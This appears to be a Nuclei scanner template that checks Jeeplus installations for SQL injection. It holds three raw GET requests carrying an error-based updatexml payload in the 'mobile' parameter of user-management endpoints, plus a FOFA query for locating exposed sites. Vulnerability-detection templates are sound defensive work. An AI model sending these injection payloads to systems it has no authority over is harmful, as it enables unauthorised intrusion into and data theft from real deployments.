id: jeeplus-sql-injection

info:
  name: Jeeplus SQL injection
  author: lsqm
  severity: high
  description: |
    FOFA: app="Jeeplus"
  reference:
    - https://www.freebuf.com/articles/web/220066.html
  tags: jeeplus,sqli


http:
  - raw:
      - |
        GET /a/sys/user/resetPassword?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(73648273)),0x7e),1))%23 HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /a/sys/user/validateMobileExist?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(73648273)),0x7e),1))%23 HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /a/sys/user/validateMobile?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(73648273)),0x7e),1))%23 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        part: status_code
        status:
          - 500
      - type: word
        part: body
        words:
          - '8f944ae2aec88be6a997e2c77b1a3f4'
        condition: and